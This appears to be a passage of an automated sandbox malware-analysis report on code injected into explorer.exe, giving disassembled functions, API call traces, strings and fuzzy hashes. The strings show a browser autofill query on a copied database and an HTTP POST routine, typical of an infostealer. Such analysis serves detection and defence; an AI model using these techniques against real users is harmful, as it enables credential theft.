                                                      • String ID:
                                                      • API String ID: 1675517319-0
                                                      • Opcode ID: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                      • Instruction ID: da5cb47bbe52387c3e0a1681ea9d7598d9257fffee12612a3050b05896cbbd2f
                                                      • Opcode Fuzzy Hash: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                      • Instruction Fuzzy Hash: 35E048319052106BC758BB70BD69FDF3B99AF96361F20C91DB26592492CB36CC818660
                                                      Function 000C1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                      • Instruction ID: e0211589613c60c02250040143a06265190b4a18b4b9426254d9e333ec9573f1
                                                      • Opcode Fuzzy Hash: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                      • Instruction Fuzzy Hash: 93A002755511047BDD4857A49F0DA5A3528F7C4702F108544714586451DAA55444C721
                                                      Function 000C6512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE(001220A4,00000001,00000000,0000000A,00113127,000C28DA,00000000,?), ref: 000CBFFC
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem
                                                      • String ID:
                                                      • API String ID: 31276548-0
                                                      • Opcode ID: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                      • Instruction ID: 133605fa1fdf14a26a9ee541db0d16855689646c758a655b25552749d386d937
                                                      • Opcode Fuzzy Hash: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                      • Instruction Fuzzy Hash: 53E0E53178475076E63077B87C47F9E25855BE0B10F704A6DFA10A91CBDFA781A11026
                                                      Function 000C3C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 206 c3c40-c3c52 call c1b6a 209 c3c58-c3c95 call c1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 114bec 206->209 210 c3dfa-c3e01 206->210 214 c3c9a-c3c9c 209->214 215 c3dec-c3df5 DeleteFileW call c1011 214->215 216 c3ca2-c3cba call feeb8 214->216 215->210 220 c3cc0-c3cdf call c1000 call e02ec 216->220 221 c3de3-c3de7 call 113848 216->221 227 c3d9f-c3da2 220->227 221->215 228 c3da8-c3db7 call dfb92 lstrlen 227->228 229 c3ce4-c3cfa call c1fa7 227->229 236 c3ddc-c3dde call c1011 228->236 237 c3db9-c3dd7 call c1798 * 3 228->237 234 c3cfc-c3d02 229->234 235 c3d08-c3d1d call c1fa7 229->235 234->235 239 c3d04 234->239 244 c3d1f-c3d25 235->244 245 c3d2b-c3d33 lstrlen 235->245 236->221 237->236 239->235 244->245 247 c3d27 244->247 248 c3d35-c3d3a lstrlen 245->248 249 c3d96-c3d9a call e02ec 245->249 247->245 248->249 252 c3d3c-c3d6f call c1000 wsprintfA lstrlen 248->252 249->227 256 c3d71-c3d81 call c102f 252->256 257 c3d83-c3d91 lstrcat call c1011 252->257 256->257 257->249
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3C6A
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3C76
                                                      • DeleteFileW.KERNEL32(00000000), ref: 000C3C7D
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3C89
                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 000C3D2F
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3D36
                                                      • wsprintfA.USER32 ref: 000C3D55
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3D61
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3D89
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3DB2
                                                      • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C3DED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                      • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                      • API String ID: 2923052733-3488123210
                                                      • Opcode ID: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                      • Instruction ID: c2bcd80db5c543a617e39dcba95eaf11e028253eaeca6157dfbb761b291e7096
                                                      • Opcode Fuzzy Hash: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                      • Instruction Fuzzy Hash: 0C418030614341ABD715AB74DC85FBF7AE9AF8A744F00882CF846A7253DB36DD428762
                                                      Function 000C1333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 418 c1333-c1385 call c1000 call c106c call c12a3 425 c1387-c139e 418->425 426 c13a0-c13a3 418->426 429 c13b0-c13b2 425->429 428 c13aa-c13ac 426->428 428->429 430 c13b8-c13ef RtlZeroMemory 429->430 431 c15cb-c15da call c1011 429->431 435 c13f5-c141a 430->435 436 c15c3-c15ca 430->436 439 c15bf 435->439 440 c1420-c1456 call c10b1 435->440 436->431 439->436 443 c145d-c1478 440->443 444 c1458 440->444 446 c147e-c1483 443->446 447 c15b5 443->447 444->443 448 c149d-c14c7 call c1000 wsprintfW 446->448 449 c1485-c1496 446->449 447->439 452 c14c9-c14cb 448->452 453 c14e0-c1509 448->453 449->448 454 c14cc-c14cf 452->454 460 c150f-c151b 453->460 461 c15a5-c15b0 call c1011 453->461 455 c14da-c14dc 454->455 456 c14d1-c14d6 454->456 455->453 456->454 458 c14d8 456->458 458->453 460->461 465 c1521-c1537 call c1000 460->465 461->447 468 c1539-c1544 465->468 469 c1558-c156f 468->469 470 c1546-c1553 call c102f 468->470 474 c1571 469->474 475 c1573-c157d 469->475 470->469 474->475 475->468 476 c157f-c1583 475->476 477 c159a-c15a1 call c1011 476->477 478 c1585 call c104c 476->478 477->461 481 c158a-c1594 RtlMoveMemory 478->481 481->477
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • Part of subcall function 000C106C: lstrlen.KERNEL32(003AB176,00000000,00000000,00000000,000C1366,75712B62,003AB176,00000000), ref: 000C1074
                                                        • Part of subcall function 000C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,003AB176,00000001,00000000,00000000), ref: 000C1086
                                                        • Part of subcall function 000C12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C13C2
                                                      • wsprintfW.USER32 ref: 000C14B5
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C1594
                                                      Strings
                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 000C14FB
                                                      • Accept: */*Referer: %S, xrefs: 000C14AF
                                                      • POST, xrefs: 000C1465
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                      • API String ID: 3833683434-704803497
                                                      • Opcode ID: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                      • Instruction ID: 1a514e9f141677b8d8d38dac0240c6b57a8f42db93c0a9cec2361f5d12bb06ef
                                                      • Opcode Fuzzy Hash: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                      • Instruction Fuzzy Hash: 4D7155B0608341AFD7549F28DC84EAFBBE9EB89344F10492DF955C3252DB71D9448B92
                                                      Function 000CA40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 509 ca40e-ca424 510 ca426-ca42a 509->510 511 ca4a2-ca4aa 509->511 513 ca42c-ca42f 510->513 514 ca431-ca441 510->514 512 ca4ae-ca4c8 511->512 515 ca4cc-ca4e3 ReadFile 512->515 513->511 513->514 516 ca469-ca4a0 memcpy 514->516 517 ca443 514->517 518 ca524-ca538 call ca2aa 515->518 519 ca4e5-ca4ee 515->519 516->512 520 ca44a-ca45a memcpy 517->520 521 ca445-ca448 517->521 523 ca45d 518->523 528 ca53e-ca553 memset 518->528 519->518 527 ca4f0-ca4ff call ca250 519->527 520->523 521->516 521->520 526 ca45f-ca466 523->526 527->515 531 ca501-ca51f call ca1c6 527->531 528->526 531->526
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpy$FileReadmemset
                                                      • String ID: winRead
                                                      • API String ID: 2051157613-2759563040
                                                      • Opcode ID: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                      • Instruction ID: ae3c229cc1cd92f986aedc8d904385eedd01eb6e8154fd3d065f857c3eb1b8d8
                                                      • Opcode Fuzzy Hash: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                      • Instruction Fuzzy Hash: 0B316872709248ABC794DF58CC85E9F77E6EFC9318F845928F88587211D670EC458B93
                                                      Function 000C2E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 534 c2e30-c2e55 StrStrIW 535 c2ebe-c2eec call c1000 RegOpenKeyExW 534->535 536 c2e57-c2e6c call c19e5 534->536 543 c2eee-c2efd 535->543 544 c2f68-c2f74 call c1011 535->544 541 c2ebc 536->541 542 c2e6e-c2e79 call c1bc5 536->542 541->535 552 c2e7b-c2e85 call c1afe 542->552 553 c2eb5-c2eb7 call c1011 542->553 547 c2f50-c2f5c RegEnumKeyExW 543->547 550 c2f5e-c2f62 RegCloseKey 547->550 551 c2eff-c2f26 call c1953 call c199d call c2e30 547->551 550->544 567 c2f2b-c2f4f call c1011 551->567 560 c2eae-c2eb0 call c1011 552->560 561 c2e87-c2e97 call c199d 552->561 553->541 560->553 561->560 568 c2e99-c2ea0 call c2c77 561->568 567->547 568->560
                                                      APIs
                                                      • StrStrIW.SHLWAPI(?,?), ref: 000C2E4B
                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                      • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                        • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                        • Part of subcall function 000C1BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                        • Part of subcall function 000C1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                        • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                        • Part of subcall function 000C1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                      • String ID: PathToExe
                                                      • API String ID: 1799103994-1982016430
                                                      • Opcode ID: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                      • Instruction ID: 26ee18a0ffe83efa59e30f6cb19543e95d49437544527146fba7fe573bb1303b
                                                      • Opcode Fuzzy Hash: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                      • Instruction Fuzzy Hash: E2318B31604211AF8B19AF218C15EEF7AEAEFC9350F00852CF85997252EE75CD42DBA1
                                                      Function 000C4A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 572 c4a71-c4acf call c1000 wsprintfW RegCreateKeyExW 575 c4ae6-c4af5 call c1011 572->575 576 c4ad1-c4add RegCloseKey 572->576 576->575 577 c4adf-c4ae3 576->577 577->575
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • wsprintfW.USER32 ref: 000C4AA2
                                                      • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 000C4AC7
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C4AD4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                      • String ID: %s\%08x$Software
                                                      • API String ID: 1800864259-1658101971
                                                      • Opcode ID: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                      • Instruction ID: d5e9b7e6a79eb13147b6ce8ff60bd94faf68ea9827fa1ea85af36e1d1f0cb5ef
                                                      • Opcode Fuzzy Hash: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                      • Instruction Fuzzy Hash: 02014271600008BFDB18CF90DC8AEFF77ACEB45344B10006EF900A3102EBB26E80D661
                                                      Function 000C4317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 580 c4317-c433d _alloca_probe RegOpenKeyW 581 c43cf-c43d6 580->581 582 c4343-c436b RegEnumKeyExW 580->582 583 c436d 582->583 584 c43c4-c43ce RegCloseKey 582->584 585 c436e-c43c1 call c1953 call c199d call c418a call c1011 RegEnumKeyExW 583->585 584->581 594 c43c3 585->594 594->584
                                                      APIs
                                                      • _alloca_probe.NTDLL ref: 000C431C
                                                      • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 000C4335
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4363
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C43C8
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • Part of subcall function 000C418A: wsprintfW.USER32 ref: 000C4212
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C43B9
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                      • String ID:
                                                      • API String ID: 801677237-0
                                                      • Opcode ID: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                      • Instruction ID: 60560412b716ae3b9e27860e48b4edd336cd4f6e1dd72b7b9317e541cc3f2f5f
                                                      • Opcode Fuzzy Hash: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                      • Instruction Fuzzy Hash: 4C1182B1104201BFE7199B10CC45EFF77EDFB88344F00862DF889D2151EB759E889A62
                                                      Function 000CB87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 595 cb87b-cb88a 596 cb88d-cb8e3 memset 595->596 597 cb8e5-cb8f3 call cb64b 596->597 598 cb903 596->598 603 cb8f9-cb901 597->603 604 cbaf3-cbaf9 597->604 600 cb905-cb914 call cb609 598->600 606 cb91a-cb923 call cb828 600->606 607 cbae3 600->607 603->600 613 cb929-cb941 606->613 614 cbad6-cbae1 call c68ec 606->614 609 cbae8-cbaf1 call c68ec 607->609 609->604 615 cb946-cb94d 613->615 616 cb943-cb944 613->616 614->609 618 cb950-cb962 615->618 616->618 620 cb965-cb97c CreateFileW 618->620 621 cb97e-cb983 620->621 622 cb9cb-cb9e4 call ca2aa 620->622 623 cb985-cb9aa call c6614 call cbb9f call c6620 621->623 624 cb9b6-cb9c9 call ca250 621->624 631 cb9e6-cb9fd call c68ec * 2 622->631 632 cba41-cba46 622->632 649 cb9ac-cb9b0 623->649 650 cb9b2 623->650 624->620 624->622 647 cb9ff-cba04 631->647 648 cba14-cba3c call ca1c6 call 114db2 631->648 635 cba48-cba52 632->635 636 cba54-cba6e call c68ec * 2 632->636 635->636 651 cba74 636->651 652 cba70-cba72 636->652 647->648 653 cba06-cba0f 647->653 648->604 649->622 649->650 650->624 655 cba79-cba8a 651->655 652->655 653->596 657 cba8c 655->657 658 cba90-cbaa2 call 1152ae 655->658 657->658 663 cbaa8-cbad4 658->663 664 cbaa4 658->664 663->604 664->663
                                                      APIs
                                                      • memset.NTDLL ref: 000CB8D5
                                                      • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 000CB96F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CreateFilememset
                                                      • String ID: psow$winOpen
                                                      • API String ID: 2416746761-4101858489
                                                      • Opcode ID: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                      • Instruction ID: b1bc4cd02a3218cecb152b020c0a59bdbdab4f0ce4d5c418b4c02a62c680d3a7
                                                      • Opcode Fuzzy Hash: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                      • Instruction Fuzzy Hash: 6271A271A04705AFC760DF28C882B5EBBE0FF88724F104A2DF9A497291D775D954CB92
                                                      Function 000C19E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 740 c19e5-c19f5 741 c19fa-c1a26 RegOpenKeyExW 740->741 742 c19f7 740->742 743 c1a28-c1a44 RegQueryValueExW 741->743 744 c1aa2-c1aa7 741->744 742->741 747 c1a94-c1aa0 RegCloseKey 743->747 748 c1a46-c1a4c 743->748 745 c1aa9-c1ab9 call c19e5 744->745 746 c1abb 744->746 750 c1abd-c1ac3 745->750 746->750 747->744 747->746 748->747 751 c1a4e-c1a53 748->751 753 c1a5a-c1a7d call c1000 RegQueryValueExW 751->753 754 c1a55-c1a58 751->754 757 c1a7f-c1a81 753->757 758 c1a8b-c1a92 call c1011 753->758 754->747 754->753 757->747 759 c1a83-c1a89 757->759 758->747 759->747
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                      • String ID:
                                                      • API String ID: 217796345-0
                                                      • Opcode ID: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                      • Instruction ID: 4fabfa7a8463360d32696f745825540dc6acb7b390ca864aeb677513e9c86ef9
                                                      • Opcode Fuzzy Hash: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                      • Instruction Fuzzy Hash: 0C21A37220A341AFE7288B21CD04FBFB7E9EFCA754F144A2DF98592152E621CD409722
                                                      Function 000C1EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyW.ADVAPI32(?,?,?), ref: 000C1ED5
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F0C
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C1F98
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F82
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                      • String ID:
                                                      • API String ID: 1077800024-0
                                                      • Opcode ID: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                      • Instruction ID: 312801df20b4c6f434773809451dbac0668461fae7b5efeb80e90be44095c6c3
                                                      • Opcode Fuzzy Hash: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                      • Instruction Fuzzy Hash: 75215C71208301BFD7099B21DC49EAFBBEDEF8A344F00892DF89992152DB75CD459B62
                                                      Function 000C1C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                      • String ID:
                                                      • API String ID: 2517252058-0
                                                      • Opcode ID: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                      • Instruction ID: 8869eff0aedb4585e5cfe9fd9f846d2800c3cea474541fe7e1c897e5fe57ff3c
                                                      • Opcode Fuzzy Hash: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                      • Instruction Fuzzy Hash: 2FF081312002187BD2241B25DC88FFF7A9CDB477B5F16061DF51592192EB539C458171
                                                      Function 000C2EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                        • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
